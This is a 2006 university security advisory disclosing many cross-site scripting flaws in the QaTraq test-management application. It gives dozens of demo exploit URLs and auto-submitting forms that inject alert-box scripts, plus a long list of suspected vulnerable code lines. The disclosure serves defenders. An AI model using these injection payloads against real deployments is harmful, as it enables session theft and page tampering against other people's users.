<<< Date Index >>>     <<< Thread Index >>>

QaTraq 6.5 RC: Multiple XSS Vulnerabilities



===========================================================
QaTraq 6.5 RC: Multiple XSS Vulnerabilities
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0606-001, June 23, 2006
===========================================================


Affected applications
----------------------

QaTraq (http://sourceforge.net/projects/qatraq/)

Versions 6.5 RC and prior.


Description
------------

There are a number of reflected XSS vulnerabilities, some of which are also 
stored XSS vulnerabilities and perhaps even SQL injection vulnerabilitities. 
The affected program points as well as demo exploits are given below. The 
exploits have been tested with the user being logged in as admin, and 
register_globals being active. It is possible that some vulnerabilities do not 
require register_globals to be enabled, although we have not tested this. Some 
of the parameters in the given sample exploits (mainly "id" params) have to be 
adjusted to the given installation to match existing database entries.

In addition to program points for which exploits are given, we have listed 
about 200 places that are very similar in structure. Although we have not 
explicitly tested them with exploits, we suspect that they are vulnerable as 
well. 

top.inc
---------

line 1005
http://localhost/qatraq65rc/queries_view_search.php?link_print='"><script>alert('hi')</script>

line 1007
http://localhost/qatraq65rc/queries_view_search.php?link_upgrade='"><script>alert('hi')</script>

line 1020
http://localhost/qatraq65rc/queries_view_search.php?link_sql='"><script>alert('hi')</script>

line 1041
http://localhost/qatraq65rc/queries_view_search.php?link_next=";><script>alert('hi')</script>

line 1054
http://localhost/qatraq65rc/queries_view_search.php?link_prev=";><script>alert('hi')</script>

line 1067
http://localhost/qatraq65rc/queries_view_search.php?link_list=";><script>alert('hi')</script>


components_copy_content.php
-----------------------------

line 233
http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1&msg=<script>alert('hi')</script>
[product_id and id (= component id) must exist in the database]

line 238
- use the attack page:
<form method="post" 
action="http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="component_name" 
value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 260
- analogous to 238:
<form method="post" 
action="http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="component_name" value='some_new_name'/>
<input type="hidden" name="component_desc" 
value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>


components_modify_content.php
-------------------------------

line 213
http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1&msg=<script>alert('hi')</script>

line 218
<form method="post" 
action="http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="component_name" 
value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 240
<form method="post" 
action="http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="component_name" value='some_new_name'/>
<input type="hidden" name="component_desc" 
value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>


components_new_content.php
-----------------------------

line 188
http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1&msg=<script>alert('hi')</script>

line 193
<form method="post" 
action="http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="component_name" 
value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 215
<form method="post" 
action="http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="component_name" value='another_new_name'/>
<input type="hidden" name="component_desc" 
value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>


design_copy_content.php
-------------------------

line 262
- use this page [plan_id must exist in the database]:
<form method="post" 
action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 276
<form method="post" 
action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="version" value='<script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 313
<form method="post" 
action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="content" 
value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>


design_copy_plan_search.php
-----------------------------

line 106
<form method="post" 
action="http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&plan_id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="plan_title" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 107
<form method="post" 
action="http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&plan_id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="plan_content" 
value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

design_modify_content.php
---------------------------

line 282
<form method="post" 
action="http://localhost/qatraq65rc/design_modify_content.php?id=1&plan_id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 298
- $new_doc_id is constructed from $major_version and $minor_version on line 
189; these two are only set if POST['version_increment'] is set; use this page 
[and watch for suitable id]:
<form method="post" 
action="http://localhost/qatraq65rc/design_modify_content.php?id=7";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="minor_version" value='<script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 311
- $new_version, analogous to 298

line 354
<form method="post" 
action="http://localhost/qatraq65rc/design_modify_content.php?id=10";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="content" 
value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

design_new_content.php
------------------------

line 226
<form method="post" 
action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 240
<form method="post" 
action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="version" value='<script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 276
<form method="post" 
action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="content" 
value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

design_new_search.php
-----------------------

line 99
http://localhost/qatraq65rc/design_new_search.php?plan_name=";><script>alert('hi')</script>

line 100
http://localhost/qatraq65rc/design_new_search.php?plan_desc=";><script>alert('hi')</script>

download.php
-------------

line 31
http://localhost/qatraq65rc/download.php?file_name=<script>alert('hi')</script>

login.php
----------

line 88
http://localhost/qatraq65rc/login.php?username=";><script>alert('hi')</script>

line 98
http://localhost/qatraq65rc/login.php?password=";><script>alert('hi')</script>

phase_copy_content.php
------------------------

line 245
<form method="post" 
action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 259
<form method="post" 
action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="version" value='<script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 285
<form method="post" 
action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="content" 
value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

phase_delete_search.php
-------------------------

line 176
<form method="post" 
action="http://localhost/qatraq65rc/phase_delete_search.php";>
<input type="hidden" name="page_action" value="search"/>
<input type="hidden" name="content" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

phase_modify_content.php
--------------------------

line 273
<form method="post" 
action="http://localhost/qatraq65rc/phase_modify_content.php?id=2&plan_id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 289
<form method="post" 
action="http://localhost/qatraq65rc/phase_modify_content.php?id=2";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="minor_version" value='<script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 302
- $new_version, analogous to 289

line 335
<form method="post" 
action="http://localhost/qatraq65rc/phase_modify_content.php?id=2";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="content" 
value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

phase_modify_search.php
------------------------

line 177
<form method="post" 
action="http://localhost/qatraq65rc/phase_modify_search.php";>
<input type="hidden" name="page_action" value="search"/>
<input type="hidden" name="content" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

phase_new_content.php
----------------------

line 209
<form method="post" 
action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 223
<form method="post" 
action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="version" value='<script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 252
<form method="post" 
action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="content" 
value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

phase_view_search.php
----------------------

line 176
<form method="post" action="http://localhost/qatraq65rc/phase_view_search.php";>
<input type="hidden" name="page_action" value="search"/>
<input type="hidden" name="content" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

products_copy_content.php
---------------------------

line 175
http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1&msg=<script>alert('hi')</script>

line 180
<form method="post" 
action="http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="product_name" 
value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>

line 185
<form method="post" 
action="http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1";>
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="product_name" value='some_new_name'/>
<input type="hidden" name="product_desc" 
value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>


Other suspicious places (without exploits)
---------------------------------------------

- products_copy_search.php, line 116, $product_name
- products_copy_search.php, line 117, $product_desc
- products_delete_search.php, line 116, $product_name
- products_delete_search.php, line 117, $product_desc
- products_modify_content.php, line 186, $msg
- products_modify_content.php, line 191, $product_name
- products_modify_content.php, line 196, $product_desc
- products_modify_search.php, line 116, $product_name
- products_modify_search.php, line 117, $product_desc
- products_new_content.php, line 157, $msg
- products_new_content.php, line 162, $product_name
- products_new_content.php, line 167, $product_desc
- products_view_search.php, line 116, $product_name
- products_view_search.php, line 117, $product_desc
- queries_copy_content.php, line 182, $msg
- queries_copy_content.php, line 195, $title
- queries_copy_content.php, line 227, $description
- queries_copy_search.php, line 154, $title
- queries_copy_search.php, line 155, $id
- queries_copy_search.php, line 170, $description
- queries_delete_search.php, line 152, $title
- queries_delete_search.php, line 153, $id
- queries_delete_search.php, line 167, $description
- queries_modify_content.php, line 247, $msg
- queries_modify_content.php, line 260, $title
- queries_modify_content.php, line 292, $description
- queries_modify_content.php, line 308, $query
- queries_modify_search.php, line 152, $title
- queries_modify_search.php, line 153, $id
- queries_modify_search.php, line 167, $description
- queries_new_content.php, line 162, $msg
- queries_new_content.php, line 174, $title
- queries_new_content.php, line 222, $query
- queries_view_search.php, line 156, $title
- queries_view_search.php, line 157, $id
- queries_view_search.php, line 172, $description
- reports_copy_content.php, line 202, $msg
- reports_copy_content.php, line 215, $title
- reports_copy_content.php, line 247, $description
- reports_copy_content.php, line 255, $tmt
- reports_copy_search.php, line 147, $title
- reports_copy_search.php, line 148, $id
- reports_delete_search.php, line 148, $title
- reports_delete_search.php, line 149, $id
- reports_modify_content.php, line 266, $msg
- reports_modify_content.php, line 279, $title
- reports_modify_content.php, line 311, $description
- reports_modify_content.php, line 319, $query  $tmt
- reports_modify_search.php, line 148, $title
- reports_modify_search.php, line 149, $id
- reports_new_content.php, line 162, $msg
- reports_new_content.php, line 174, $title
- reports_new_content.php, line 190, $report_type
- reports_new_content.php, line 206, $description
- reports_new_content.php, line 214, $query  $tmt
- reports_view_content.php, line 187, $tmt 
- reports_view_content.php, line 194, $results
- reports_view_search.php, line 147, $title
- reports_view_search.php, line 148, $id
- reports_view_search.php, line 147, $title
- reports_view_search.php, line 148, $id
- requ_copy_content.php, line 217, $title
- requ_copy_content.php, line 252, $url
- requ_copy_content.php, line 274, $content
- requ_modify_content.php, line 209, $title
- requ_modify_content.php, line 244, $url
- requ_modify_content.php, line 266, $content
- requ_new_content.php, line 185, $title
- requ_new_content.php, line 214, $url
- requ_new_content.php, line 237, $content
- requ_new_search.php, line 99, $product_name
- requ_new_search.php, line 100, $product_desc
- results_modify_multiple.php, line 657, -> includes/ui.inc, line 116
- results_modify_multiple.php, line 395, $msg
- results_modify_search.php, line 182, $content
- results_modify_single.php, line 429, $msg
- results_modify_single.php, line 850, $TestDate
- results_view_multiple.php, line 125, $msg
- results_view_search.php, line 182, $content
- results_view_single.php, line 164, $msg
- roles_copy_content.php, line 190, $msg
- roles_copy_content.php, line 195, $role_name
- roles_copy_content.php, line 200, $role_desc
- roles_copy_search.php, line 117, $role_name
- roles_copy_search.php, line 118, $role_desc
- roles_delete_search.php, line 118, $role_name
- roles_delete_search.php, line 119, $role_desc
- roles_modify_content.php, line 203, $msg
- roles_modify_content.php, line 208, $role_name
- roles_modify_content.php, line 213, $role_desc
- roles_modify_search.php, line 118, $role_name
- roles_modify_search.php, line 119, $role_desc
- roles_new_content.php, line 172, $msg
- roles_new_content.php, line 177, $role_name
- roles_new_content.php, line 182, $role_desc
- roles_view_search.php, line 118, $role_name
- roles_view_search.php, line 119, $role_desc
- test_cases_copy_content.php, line 357, -> includes/ui.inc, line 198, $base_url
- test_cases_copy_content.php, line 289, $title
- test_cases_copy_content.php, line 303, $version
- test_cases_copy_content.php, line 382, $content
- test_cases_modify_content.php, line 383, $title
- test_cases_modify_content.php, line 399, $new_doc_id
- test_cases_modify_content.php, line 412, $new_version
- test_cases_modify_content.php, line 486, $content
- test_cases_modify_content.php, line 536, $filter_title
- test_cases_modify_content.php, line 537, $filter_tsc_id
- test_cases_new_content.php, line 341, $title
- test_cases_new_content.php, line 355, $version
- test_cases_new_content.php, line 431, $content
- test_cases_new_content.php, line 481, $filter_title
- test_cases_new_content.php, line 482, $filter_tsc_id
- test_cases_new_search.php, line 99, $product_name
- test_cases_new_search.php, line 100, $product_desc
- test_cases_view_content.php, line 302, $filter_tsc_id
- test_plans_copy_content.php, line 274, $title
- test_plans_copy_content.php, line 292, $version
- test_plans_copy_content.php, line 344, $content
- test_plans_modify_content.php, line 306, $title
- test_plans_modify_content.php, line 322, $new_doc_id
- test_plans_modify_content.php, line 339, $new_version
- test_plans_modify_content.php, line 398, $content
- test_plans_new_content.php, line 240, $title
- test_plans_new_content.php, line 258, $version
- test_plans_new_content.php, line 313, $content
- test_plans_new_search.php, line 96, $project_name
- test_plans_new_search.php, line 97, $project_desc
- test_scripts_copy_content.php, line 354, $title
- test_scripts_copy_content.php, line 368, $version
- test_scripts_copy_content.php, line 500, $content
- test_scripts_copy_design_search.php, line 100, $design_title
- test_scripts_copy_search.php, line 180, $content
- test_scripts_delete_search.php, line 182, $content
- test_scripts_include_cases_search.php, line 417, -> includes/ui.inc, line 34, 
$table_name
- test_scripts_include_cases_search.php, line 1068, -> includes/ui.inc, line 
34, $table_name
- test_scripts_include_cases_search.php, line 875, -> includes/ui.inc, line 
198, $base_url
- test_scripts_include_cases_search.php, line 427, $msg
- test_scripts_include_cases_search.php, line 576, $test_script[Title]
- test_scripts_include_cases_search.php, line 798, $tc_msg
- test_scripts_include_cases_search.php, line 809, $tc_title
- test_scripts_include_cases_search.php, line 823, $tc_version
- test_scripts_include_cases_search.php, line 1074, $row[Title]
- test_scripts_include_cases_search.php, line 1084, $row
- test_scripts_include_cases_search.php, line 1087, $row 
- test_scripts_include_cases_search.php, line 1096, $row[DocumentID]
- test_scripts_include_cases_search.php, line 1105, $row[ID]
- test_scripts_include_cases_search.php, line 1106, $row[ID]
- test_scripts_include_cases_search.php, line 1108, $row[ID]
- test_scripts_include_cases_search.php, line 1109, $row[ID]
- test_scripts_include_cases_search.php, line 1118, $row 
- test_scripts_include_cases_search.php, line 1124, $row  $ordering 
- test_scripts_include_search.php, line 163, $content
- test_scripts_modify_content.php, line 404, $title
- test_scripts_modify_content.php, line 420, $new_doc_id
- test_scripts_modify_content.php, line 433, $new_version
- test_scripts_modify_content.php, line 581, $content
- test_scripts_modify_content.php, line 726, $ordering_
- test_scripts_modify_search.php, line 181, $content
- test_scripts_new_content.php, line 293, $title
- test_scripts_new_content.php, line 307, $version
- test_scripts_new_content.php, line 426, $content
- test_scripts_new_search.php, line 93, $design_title
- test_scripts_remove_cases_search.php, line 375, -> includes/ui.inc, line 34, 
$table_name
- test_scripts_remove_cases_search.php, line 138, -> includes/ui.inc, line 34, 
$table_name
- test_scripts_remove_cases_search.php, line 148, $msg
- test_scripts_remove_cases_search.php, line 256, $test_script[Title]
- test_scripts_remove_cases_search.php, line 381, $row[Title]
- test_scripts_remove_cases_search.php, line 387, $is_selected  $row
- test_scripts_remove_cases_search.php, line 393, $row[DocumentID]
- test_scripts_remove_cases_search.php, line 405, $row[Ordering]
- test_scripts_remove_cases_search.php, line 423, $row[Title]
- test_scripts_remove_search.php, line 165, $content
- test_scripts_view_search.php, line 182, $content
- upload.php, line 51
- users_copy_content.php, line 249, $msg
- users_copy_content.php, line 254, $login_name
- users_copy_content.php, line 258, $user_name
- users_copy_content.php, line 263, $user_password
- users_copy_search.php, line 129, $login_name
- users_copy_search.php, line 130, $user_name
- users_copy_search.php, line 131, $default_role
- users_delete_content.php, line 146, $msg
- users_delete_search.php, line 129, $login_name
- users_delete_search.php, line 130, $user_name
- users_delete_search.php, line 131, $default_role
- users_modify_content.php, line 463, -> includes/ui.inc, line 116, 
$arr_table_vals[table_multi_display_line.$i]
- users_modify_content.php, line 385, $msg
- users_modify_content.php, line 394, $user_name
- users_modify_content.php, line 399, $user_password
- users_modify_search.php, line 127, $login_name
- users_modify_search.php, line 128, $user_name
- users_modify_search.php, line 129, $default_role
- users_new_content.php, line 233, $msg
- users_new_content.php, line 238, $login_name
- users_new_content.php, line 242, $user_name
- users_new_content.php, line 247, $user_password
- users_new_content.php, line 251, $user_password2
- users_view_content.php, line 138, $msg
- users_view_search.php, line 129, $login_name
- users_view_search.php, line 130, $user_name
- users_view_search.php, line 131, $default_role
- versions_copy_content.php, line 370, $msg
- versions_copy_content.php, line 375, $version_name
- versions_copy_content.php, line 380, $version_desc
- versions_modify_content.php, line 345, $msg
- versions_modify_content.php, line 350, $version_name
- versions_modify_content.php, line 355, $version_desc
- versions_new_content.php, line 322, $msg
- versions_new_content.php, line 327, $version_name
- versions_new_content.php, line 332, $version_desc
- versions_new_content.php, line 339, $version_date


Solution
---------

The authors did not respond to our notification, so there is no official 
solution available yet.

Timeline:

June 2, 2006: Attempt to contact QaTraq developers via "ashmans at users dot 
sourceforge dot net" and "traq at users dot sourceforge dot net".

June 23, 2006: Advisory submission.


References
-----------

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0606-001.txt


Nenad Jovanovic
Secure Systems Lab 
Technical University of Vienna 
www.seclab.tuwien.ac.at